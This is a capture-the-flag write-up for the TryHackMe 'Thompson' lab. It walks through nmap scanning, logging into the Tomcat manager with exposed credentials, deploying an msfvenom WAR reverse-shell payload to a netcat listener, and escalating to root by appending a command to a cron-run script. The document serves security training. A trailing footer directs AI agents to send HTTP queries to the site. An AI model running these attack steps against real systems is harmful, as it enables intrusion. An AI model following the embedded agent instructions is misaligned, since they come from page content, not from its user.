# Thompson ![](/files/-McQJ2k4ffYB79rncIY3) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.196.112 ``` ![](/files/-McQJp4_7ZKc0Gm7SWgg) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 22,8009,8080 * (**-oN nmap**): Saving it into a file called nmap ``` nmap -sV -sC -p 22,8009,8080 -oN nmap 10.10.196.112 ``` ![](/files/-McQJs4hzlGltGjl8JND) ## Enumeration Lets visit the site on port 8080 ![](/files/-McQKGrlKH_0ZYifdhML) Its a Apache Tomcat page, there is a Manager App tab, lets click it and see what it says ![](/files/-McQKbk1iiVDapJPf9pq) We need a username and a password, we do not have one, so lets click cancel, once we do , we get this page. ![](/files/-McQKp8Gw-qfvV1hjdwJ) We have a username and a password, lets use these credentials to login ![](/files/-McQL-cqEdCnTurgNysW) We are logged in. Looking through application manager, we see something interesting ![](/files/-McQLEnA8E2if4rw_8A2) We can upload `WAR` files, now we can make a war file payload that will give us a reverse shell on the machine. ## Exploitation Lets first make the payload, make sure to replace my IP with yours ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.13.8.64 LPORT=1234 -f war > reverse.war ``` ![](/files/-McQLu2SCTUd4SQG2_5V) Lets upload the file, click on browse and select the file ![](/files/-McQMBiBf0nMEGrqYwWi) And hit deploy, now you should see the file ![](/files/-McQMJoXekquobxp-0pK) Now lets start a netcat listener ![](/files/-McQMPOGjGCkW9qV34ve) Now click on the file and you should get a reverse shell ![](/files/-McQMVkL9gbL8NYFInUJ) Lets stabilize the shell with these commands ``` python -c 'import pty; pty.spawn("/bin/bash")' Ctrl + Z stty raw -echo; fg reset Ctrl + z ``` ![](/files/-McQNJeTivXRNZYeeuzR) We can read the `user.txt` file ![](/files/-McQNp3X3T98Lfb0qzY3) We have two other files in the directory, lets look at what they contain ![](/files/-McQO1VMc4u-gJFY6W-7) It looks like the `id.sh` file is running the id command and sending the output to the file called `test.txt`. Lets check the cronjobs running on this machine ![](/files/-McQP9mTQXDlJ51OW780) Looks like it is reading the files in `/home/jack`, so lets transfer the root flag to this directory by adding the command in the `id.sh` file and then read it. ![](/files/-McQPrIjHNRRp0fX3NZ5) We can edit the file using `nano` or we can use this command ``` echo "cp /root/root.txt /home/jack/root.txt" >> id.sh ``` Once we do this, we should see the `root.txt` file in our directory and we can read it. ![](/files/-McQQFTwc4R2_YleMchf) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/thompson.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.